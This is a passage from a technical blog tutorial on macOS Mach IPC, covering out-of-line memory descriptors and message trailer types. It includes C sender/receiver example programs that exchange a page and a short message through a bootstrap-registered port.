class="type">mach_msg_complex_send_t</span>;</span><br></pre></td></tr></table></figure><p>Note that the descriptor in the message body is of type <code>mach_msg_ool_descriptor_t</code>, which is defined as follows:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span 
class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">typedef</span> <span class="keyword">struct</span>&#123;</span><br><span class="line">    <span class="type">void</span>*                         address;</span><br><span class="line"><span class="meta">#<span class="keyword">if</span> !defined(__LP64__)</span></span><br><span class="line">    <span class="type">mach_msg_size_t</span>               size;</span><br><span class="line"><span class="meta">#<span class="keyword">endif</span></span></span><br><span class="line">    <span class="type">boolean_t</span>                     deallocate: <span class="number">8</span>;</span><br><span class="line">    <span class="type">mach_msg_copy_options_t</span>       copy: <span class="number">8</span>;</span><br><span class="line">    <span class="type">unsigned</span> <span class="type">int</span>                  pad1: <span class="number">8</span>;</span><br><span class="line">    <span class="type">mach_msg_descriptor_type_t</span>    type: <span class="number">8</span>;</span><br><span class="line"><span class="meta">#<span class="keyword">if</span> defined(__LP64__)</span></span><br><span class="line">    <span class="type">mach_msg_size_t</span>               size;</span><br><span class="line"><span class="meta">#<span class="keyword">endif</span></span></span><br><span class="line">&#125; <span class="type">mach_msg_ool_descriptor_t</span>;</span><br></pre></td></tr></table></figure><p>Where:</p><ul><li><p>address field: the base address of the memory pages to send.</p></li><li><p>size field: the length of the memory to send.</p></li><li><p>deallocate field: whether the sent pages are <strong>implicitly deallocated</strong> from the sender once the message has been sent (as if vm_deallocate were called automatically); usually false.</p><p>Setting this field turns the <strong>memory copy</strong> into a <strong>memory move</strong>: the sender's pages are moved into the receiving process, which is more efficient.</p></li><li><p>copy 
field: specifies <strong>how the kernel copies</strong> the memory pages being sent. There are two modes:</p><ul><li>MACH_MSG_VIRTUAL_COPY: lets the kernel <strong>choose any mechanism</strong> to transfer the data. Typically the kernel <strong>copies the virtual mapping and shares the physical pages</strong>, deferring the actual data copy until a write occurs, i.e. copy-on-write.</li><li>MACH_MSG_PHYSICAL_COPY: the kernel actually copies the data into <strong>new physical pages</strong>.</li></ul></li><li><p>type field: the type of this descriptor; here it must be <strong>MACH_MSG_OOL_DESCRIPTOR</strong>.</p></li></ul><p>Next, the sender allocates a virtual page and writes some data into it (the last argument of vm_allocate is a set of VM_FLAGS_* allocation flags, not a protection mask):</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">char</span> *buf = <span class="literal">NULL</span>;</span><br><span class="line"><span class="type">vm_size_t</span> len = vm_page_size;</span><br><span class="line"><span class="keyword">if</span> (<span class="built_in">vm_allocate</span>(<span class="built_in">mach_task_self</span>(), (<span class="type">vm_address_t</span> *)&amp;buf, len,</span><br><span class="line">                VM_FLAGS_ANYWHERE) != KERN_SUCCESS)</span><br><span class="line">    <span class="built_in">abort</span>();</span><br><span class="line"><span class="built_in">strcpy</span>(buf, <span class="string">&quot;This is a buf message from sender.&quot;</span>);</span><br></pre></td></tr></table></figure><p>Then fill in the message; it is sent with mach_msg_send, as in the earlier examples:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 
Note: the message must be marked as complex here</span></span><br><span class="line">send_msg.header.msgh_bits = <span class="built_in">MACH_MSGH_BITS_SET</span>(MACH_MSG_TYPE_COPY_SEND, <span class="number">0</span>, <span class="number">0</span>, MACH_MSGH_BITS_COMPLEX);</span><br><span class="line">send_msg.header.msgh_remote_port = port;</span><br><span class="line">send_msg.header.msgh_local_port = MACH_PORT_NULL;</span><br><span class="line">send_msg.header.msgh_size = <span class="built_in">sizeof</span>(send_msg);</span><br><span class="line"></span><br><span class="line"><span class="comment">// Fill in the OOL descriptor</span></span><br><span class="line">send_msg.msgh_descriptor_count = <span class="number">1</span>;</span><br><span class="line">send_msg.descriptor.address = buf;</span><br><span class="line">send_msg.descriptor.copy = MACH_MSG_VIRTUAL_COPY;</span><br><span class="line">send_msg.descriptor.deallocate = <span class="literal">false</span>;</span><br><span class="line">send_msg.descriptor.size = len;</span><br><span class="line">send_msg.descriptor.type = MACH_MSG_OOL_DESCRIPTOR;</span><br></pre></td></tr></table></figure><h4 id="b-receiver">b. receiver</h4><p>When the receiver receives this mach message, the kernel <strong>allocates a new region of memory</strong> in the receiver's address space to hold the received data.</p><p>There used to be an option (MACH_MSG_OVERWRITE) that <strong>told the kernel</strong> to <strong>write</strong> the received data <strong>to an address chosen by the receiver</strong>, but that option has been deprecated.</p><h4 id="c-代码示例">c. 
Code example</h4><p>Below is a simple example in which the receiver takes the data the <code>MACH_MSG_ALLOCATE</code> way, that is, the kernel allocates the memory that holds it:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span 
class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;mach/mach.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;servers/bootstrap.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;unistd.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span 
class="keyword">include</span> <span class="string">&lt;assert.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="keyword">typedef</span> <span class="keyword">struct</span></span><br><span class="line">&#123;</span><br><span class="line">    <span class="type">mach_msg_header_t</span> header;</span><br><span class="line">    <span class="type">mach_msg_size_t</span> msgh_descriptor_count;</span><br><span class="line">    <span class="type">mach_msg_ool_descriptor_t</span> descriptor;</span><br><span class="line">&#125; <span class="type">mach_msg_complex_send_t</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">typedef</span> <span class="keyword">struct</span></span><br><span class="line">&#123;</span><br><span class="line">    <span class="type">mach_msg_complex_send_t</span> recv_content;</span><br><span class="line">    <span class="type">mach_msg_trailer_t</span> trailer;</span><br><span class="line">&#125; <span class="type">mach_msg_complex_receive_t</span>;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">sender</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="comment">// Wait briefly so that the receiver can register with bootstrap</span></span><br><span class="line">    <span class="built_in">usleep</span>(<span class="number">1000</span>);</span><br><span class="line">    <span class="comment">// Look up the mach port through bootstrap</span></span><br><span class="line">    <span class="type">mach_port_t</span> port;</span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">bootstrap_look_up</span>(bootstrap_port, <span class="string">&quot;io.github.kiprey&quot;</span>, &amp;port) != KERN_SUCCESS)</span><br><span class="line">        <span class="built_in">abort</span>();</span><br><span 
class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[sender] bootstrap_look_up() returned port right name %d\n&quot;</span>, port);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// Build the message to send</span></span><br><span class="line">    <span class="type">mach_msg_complex_send_t</span> send_msg;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// Note: the message must be marked as complex here</span></span><br><span class="line">    send_msg.header.msgh_bits = <span class="built_in">MACH_MSGH_BITS_SET</span>(MACH_MSG_TYPE_COPY_SEND, <span class="number">0</span>, <span class="number">0</span>, MACH_MSGH_BITS_COMPLEX);</span><br><span class="line">    send_msg.header.msgh_remote_port = port;</span><br><span class="line">    send_msg.header.msgh_local_port = MACH_PORT_NULL;</span><br><span class="line">    send_msg.header.msgh_size = <span class="built_in">sizeof</span>(send_msg);</span><br><span class="line">    <span class="comment">// Allocate the page to pass (the last vm_allocate argument is a set of VM_FLAGS_* flags)</span></span><br><span class="line">    <span class="type">char</span> *buf = <span class="literal">NULL</span>;</span><br><span class="line">    <span class="type">vm_size_t</span> len = vm_page_size;</span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">vm_allocate</span>(<span class="built_in">mach_task_self</span>(), (<span class="type">vm_address_t</span> *)&amp;buf, len,</span><br><span class="line">                    VM_FLAGS_ANYWHERE) != KERN_SUCCESS)</span><br><span class="line">        <span class="built_in">abort</span>();</span><br><span class="line">    <span class="built_in">strcpy</span>(buf, <span class="string">&quot;This is a buf message from sender.&quot;</span>);</span><br><span class="line"></span><br><span class="line">    send_msg.msgh_descriptor_count = <span class="number">1</span>;</span><br><span class="line">    send_msg.descriptor.address = buf;</span><br><span class="line">   
 send_msg.descriptor.copy = MACH_MSG_VIRTUAL_COPY;</span><br><span class="line">    send_msg.descriptor.deallocate = <span class="literal">false</span>;</span><br><span class="line">    send_msg.descriptor.size = len;</span><br><span class="line">    send_msg.descriptor.type = MACH_MSG_OOL_DESCRIPTOR;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// Send it</span></span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">mach_msg_send</span>(&amp;send_msg.header) != KERN_SUCCESS)</span><br><span class="line">        <span class="built_in">abort</span>();</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[sender] Message is sent, buf address: %p\n&quot;</span>, buf);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">receiver</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="comment">// Create a mach port with a receive right</span></span><br><span class="line">    <span class="type">mach_port_t</span> port;</span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">mach_port_allocate</span>(<span class="built_in">mach_task_self</span>(), MACH_PORT_RIGHT_RECEIVE, &amp;port) != KERN_SUCCESS)</span><br><span class="line">        <span class="built_in">abort</span>();</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[receiver] mach_port_allocate() created port right name %d\n&quot;</span>, port);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// Add a send right to this port</span></span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">mach_port_insert_right</span>(<span class="built_in">mach_task_self</span>(), port, 
port, MACH_MSG_TYPE_MAKE_SEND) != KERN_SUCCESS)</span><br><span class="line">        <span class="built_in">abort</span>();</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[receiver] mach_port_insert_right() inserted a send right\n&quot;</span>);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// Register the port&#x27;s send right with bootstrap so that other processes can look it up</span></span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">bootstrap_register</span>(bootstrap_port, <span class="string">&quot;io.github.kiprey&quot;</span>, port) != KERN_SUCCESS)</span><br><span class="line">        <span class="built_in">abort</span>();</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[receiver] bootstrap_register()&#x27;ed our port\n&quot;</span>);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// Wait for a message</span></span><br><span class="line">    <span class="type">mach_msg_complex_receive_t</span> recv_msg;</span><br><span class="line">    recv_msg.recv_content.header.msgh_size = <span class="built_in">sizeof</span>(recv_msg);</span><br><span class="line">    recv_msg.recv_content.header.msgh_local_port = port;</span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">mach_msg_receive</span>(&amp;recv_msg.recv_content.header) != KERN_SUCCESS)</span><br><span class="line">        <span class="built_in">abort</span>();</span><br><span class="line">    <span class="built_in">assert</span>(recv_msg.recv_content.msgh_descriptor_count == <span class="number">1</span>);</span><br><span class="line"></span><br><span class="line">    <span class="type">char</span> *buf = recv_msg.recv_content.descriptor.address;</span><br><span class="line">    <span class="type">size_t</span> len = recv_msg.recv_content.descriptor.size;</span><br><span class="line">    <span 
class="built_in">printf</span>(<span class="string">&quot;[receiver] Got a Message\n&quot;</span>);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[receiver] recv buf address: %p, len: %zu, content: %s\n&quot;</span>, (<span class="type">void</span> *)buf, len, buf);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">main</span><span class="params">(<span class="type">int</span> argc, <span class="type">const</span> <span class="type">char</span> *argv[])</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    fork() ? <span class="built_in">sender</span>() : <span class="built_in">receiver</span>();</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>Test output:</p><p><img src="/2021/12/mach_ipc_intro/image-20211230091913991.png" alt="image-20211230091913991"></p><h3 id="4-Message-Trailer">4. 
Message Trailer</h3><p>A Mach message delivered to a receiver carries a trailer structure after the message body.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">typedef</span> <span class="keyword">struct</span></span><br><span class="line">&#123;</span><br><span class="line">    <span class="type">mach_msg_header_t</span> header;</span><br><span class="line">    <span class="type">char</span> texts[<span class="number">0x20</span>];</span><br><span class="line">    <span class="type">int</span> integer;</span><br><span class="line">&#125; <span class="type">mach_msg_send_t</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">typedef</span> <span class="keyword">struct</span></span><br><span class="line">&#123;</span><br><span class="line">    <span class="type">mach_msg_send_t</span> recv_content;</span><br><span class="line">    <span class="type">mach_msg_trailer_t</span> trailer;</span><br><span class="line">&#125; <span class="type">mach_msg_receive_t</span>;</span><br></pre></td></tr></table></figure><p>The <code>mach_msg_trailer_t</code> structure has the following fields:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">typedef</span> <span class="keyword">struct</span>&#123;</span><br><span class="line">    <span class="type">mach_msg_trailer_type_t</span>       msgh_trailer_type;</span><br><span class="line">    <span 
class="type">mach_msg_trailer_size_t</span>       msgh_trailer_size;</span><br><span class="line">&#125; <span class="type">mach_msg_trailer_t</span>;</span><br></pre></td></tr></table></figure><p>The first field identifies the trailer format, and the second field gives the size of the trailer in bytes.</p><p>As for the trailer format, macOS currently exposes only one to user space, <code>MACH_MSG_TRAILER_FORMAT_0</code>:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">typedef</span> <span class="type">unsigned</span> <span class="type">int</span> <span class="type">mach_msg_trailer_type_t</span>;</span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> MACH_MSG_TRAILER_FORMAT_0       0</span></span><br></pre></td></tr></table></figure><p>Within that format, however, there are several trailer structures:</p><ol><li><p><strong>mach_msg_trailer_t</strong>: an empty trailer that contains only the type and size fields.</p></li><li><p><strong>mach_msg_seqno_trailer_t</strong>: extends the memory layout of the first structure with a third field:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">typedef</span> <span class="type">natural_t</span> <span class="type">mach_port_seqno_t</span>;            <span class="comment">/* sequence number */</span></span><br><span class="line"></span><br><span class="line"><span class="type">mach_port_seqno_t</span>             msgh_seqno;</span><br></pre></td></tr></table></figure><p>This is the sequence number of the message.</p></li><li><p><strong>mach_msg_security_trailer_t</strong>: extends the second structure with a fourth field:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span 
class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">typedef</span> <span class="keyword">struct</span>&#123;</span><br><span class="line"> <span class="type">unsigned</span> <span class="type">int</span>                  val[<span class="number">2</span>];</span><br><span class="line">&#125; <span class="type">security_token_t</span>;</span><br><span class="line"></span><br><span class="line"><span class="type">security_token_t</span>              msgh_sender;</span><br></pre></td></tr></table></figure><p>The two integers in the security token are the sender's UID and GID.</p></li><li><p><strong>mach_msg_audit_trailer_t</strong>: extends the third structure with a fifth field:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment"> * The audit token is an opaque token which identifies</span></span><br><span class="line"><span class="comment"> * Mach tasks and senders of Mach messages as subjects</span></span><br><span class="line"><span class="comment"> * to the BSM audit system.  
Only the appropriate BSM</span></span><br><span class="line"><span class="comment"> * library routines should be used to interpret the</span></span><br><span class="line"><span class="comment"> * contents of the audit token as the representation</span></span><br><span class="line"><span class="comment"> * of the subject identity within the token may change</span></span><br><span class="line"><span class="comment"> * over time.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="keyword">typedef</span> <span class="keyword">struct</span>&#123;</span><br><span class="line"> <span class="type">unsigned</span> <span class="type">int</span>                  val[<span class="number">8</span>];</span><br><span class="line">&#125; <span class="type">audit_token_t</span>;</span><br><span class="line"></span><br><span class="line"><span class="type">audit_token_t</span>                 msgh_audit;</span><br></pre></td></tr></table></figure><p>The audit token holds eight integers and must be interpreted through the dedicated BSM library routines rather than read directly.</p></li><li><p><strong>mach_msg_context_trailer_t</strong>: extends the fourth structure with a sixth field, <code>msgh_context</code>.</p></li><li><p><strong>mach_msg_mac_trailer_t</strong>: extends the fifth structure with further fields (<code>msgh_ad</code> and <code>msgh_labels</code> in current XNU headers).</p></li><li><p><strong>mach_msg_max_trailer_t</strong>: the largest trailer; in current XNU headers it is a typedef for <code>mach_msg_mac_trailer_t</code> rather than a structure with an extra field.</p></li></ol><blockquote><p>As you can see, each trailer layout is a prefix of the next one, which helps compatibility.</p></blockquote><p>A receiver that wants more than the minimal trailer must <strong>explicitly set the option argument of mach_msg</strong> to state that <strong>the trailer format is FORMAT_0</strong> and to name <strong>the last trailer field it wants to receive</strong>. Consider the following example:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Wait for a message</span></span><br><span class="line"><span 
class="type">mach_msg_receive_t</span> message;</span><br><span class="line"><span class="type">mach_msg_option_t</span> option = MACH_RCV_MSG </span><br><span class="line">    | <span class="built_in">MACH_RCV_TRAILER_TYPE</span>(MACH_MSG_TRAILER_FORMAT_0) </span><br><span class="line">    | <span class="built_in">MACH_RCV_TRAILER_ELEMENTS</span>(MACH_RCV_TRAILER_SENDER);</span><br><span class="line">kr = <span class="built_in">mach_msg</span>(&amp;message.recv_content.header, option,</span><br><span class="line">              <span class="number">0</span>, <span class="built_in">sizeof</span>(message), port,</span><br><span class="line">              MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);</span><br></pre></td></tr></table></figure><p>In this example, option includes <code>MACH_RCV_TRAILER_ELEMENTS(MACH_RCV_TRAILER_SENDER)</code>, which <strong>requests a trailer of type mach_msg_security_trailer_t</strong>, because <strong>the last field of that type is the sender token</strong>.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">define</span> MACH_RCV_TRAILER_NULL   0 <span class="comment">// mach_msg_trailer_t </span></span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> MACH_RCV_TRAILER_SEQNO  1 <span class="comment">// mach_msg_seqno_trailer_t </span></span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> MACH_RCV_TRAILER_SENDER 2 <span class="comment">// mach_msg_security_trailer_t </span></span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> MACH_RCV_TRAILER_AUDIT  3 <span class="comment">// mach_msg_audit_trailer_t</span></span></span><br></pre></td></tr></table></figure><p>Here is a simple test program:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span 
class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span 
class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;mach/mach.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;servers/bootstrap.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;unistd.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;string.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;assert.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="keyword">typedef</span> <span class="keyword">struct</span></span><br><span class="line">&#123;</span><br><span class="line">    <span class="type">mach_msg_header_t</span> header;</span><br><span class="line">    <span class="type">char</span> texts[<span class="number">0x20</span>];</span><br><span class="line">    <span 
class="type">int</span> integer;</span><br><span class="line">&#125; <span class="type">mach_msg_send_t</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">typedef</span> <span class="keyword">struct</span></span><br><span class="line">&#123;</span><br><span class="line">    <span class="type">mach_msg_send_t</span> recv_content;</span><br><span class="line">    <span class="type">mach_msg_security_trailer_t</span> trailer;</span><br><span class="line">&#125; <span class="type">mach_msg_receive_t</span>;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">sender</span><span class="params">()</span> </span>&#123;</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[sender] Current UID(%d) GID(%d)\n&quot;</span>, <span class="built_in">getuid</span>(), <span class="built_in">getgid</span>());</span><br><span class="line">    <span class="built_in">usleep</span>(<span class="number">1000</span>);</span><br><span class="line">    <span class="comment">// Look up the mach port through bootstrap</span></span><br><span class="line">    <span class="type">mach_port_t</span> port;</span><br><span class="line">    <span class="type">kern_return_t</span> kr = <span class="built_in">bootstrap_look_up</span>(bootstrap_port, <span class="string">&quot;io.github.kiprey&quot;</span>, &amp;port);</span><br><span class="line">    <span class="built_in">assert</span>(kr == KERN_SUCCESS);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[sender] bootstrap_look_up() returned port right name %d\n&quot;</span>, port);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// Build the message to send</span></span><br><span class="line">    <span class="type">mach_msg_send_t</span> message;</span><br><span class="line"></span><br><span class="line">    message.header.msgh_bits 
= <span class="built_in">MACH_MSGH_BITS</span>(MACH_MSG_TYPE_COPY_SEND, <span class="number">0</span>);</span><br><span class="line">    message.header.msgh_remote_port = port;</span><br><span class="line">    message.header.msgh_local_port = MACH_PORT_NULL;</span><br><span class="line">    message.header.msgh_size = <span class="built_in">sizeof</span>(message);</span><br><span class="line"></span><br><span class="line">    <span class="built_in">strcpy</span>(message.texts, <span class="string">&quot;Hello, I&#x27;m sender&quot;</span>);</span><br><span class="line">    message.integer = <span class="number">123</span>;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// Send it</span></span><br><span class="line">    <span class="type">mach_msg_return_t</span> mr = <span class="built_in">mach_msg_send</span>(&amp;message.header);</span><br><span class="line">    <span class="built_in">assert</span>(mr == MACH_MSG_SUCCESS);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[sender] Message is sent.\n&quot;</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">receiver</span><span class="params">()</span> </span>&#123;</span><br><span class="line">    <span class="comment">// Create a mach port with a receive right</span></span><br><span class="line">    <span class="type">mach_port_t</span> port;</span><br><span class="line">    <span class="type">kern_return_t</span> kr = <span class="built_in">mach_port_allocate</span>(<span class="built_in">mach_task_self</span>(), MACH_PORT_RIGHT_RECEIVE, &amp;port);</span><br><span class="line">    <span class="built_in">assert</span>(kr == KERN_SUCCESS);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[receiver] mach_port_allocate() created port right name %d\n&quot;</span>, port);</span><br><span 
